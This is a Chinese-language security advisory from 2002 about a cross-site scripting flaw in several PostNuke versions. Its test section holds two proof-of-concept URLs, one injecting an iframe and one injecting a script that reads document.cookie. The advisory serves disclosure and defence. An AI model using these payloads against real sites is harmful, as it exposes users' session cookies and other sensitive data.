PostNuke跨站脚本可执行漏洞

发布时间：2002-03-25
更新时间：2002-03-25
严重程度：中
威胁程度：用户敏感信息泄露
错误类型：输入验证错误
利用方式：服务器模式

BUGTRAQ ID：4350

受影响系统

PostNuke Development Team PostNuke 0.7
PostNuke Development Team PostNuke 0.62
   - Apache Group Apache 1.3.20
   - Apache Group Apache 1.3.20win32
PostNuke Development Team PostNuke 0.63
   - Apache Group Apache 1.3.20
   - Apache Group Apache 1.3.20win32
PostNuke Development Team PostNuke 0.64
   - Apache Group Apache 1.3.20
   - Apache Group Apache 1.3.20win32
PostNuke Development Team PostNuke 0.70
PostNuke Development Team PostNuke 0.71
PostNuke Development Team PostNuke 0.703

详细描述
PostNuke是一款内容管理系统。

攻击者可以在index.php和modules.php脚本中插入JAVASCRIPT代码而导致跨站脚本执行漏洞，导致信息泄露。

测试代码
http://one_of_100's_of_sites/modules.php?
op=modload&name=<iframe%
20src="http://www.microsoft.com"> <-- this is
funny :o)

http://one_of_100's_of_sites/index.php?
catid=<script>alert
(document.cookie)</script>

解决方案
尚无

相关信息
Scott <rootkidd@email.com>.
参考：http://online.securityfocus.com/archive/1/263626
http://online.securityfocus.com/archive/1/263675
相关主页：http://www.postnuke.com/

最近严重漏洞

PostNuke跨站脚本可执行漏洞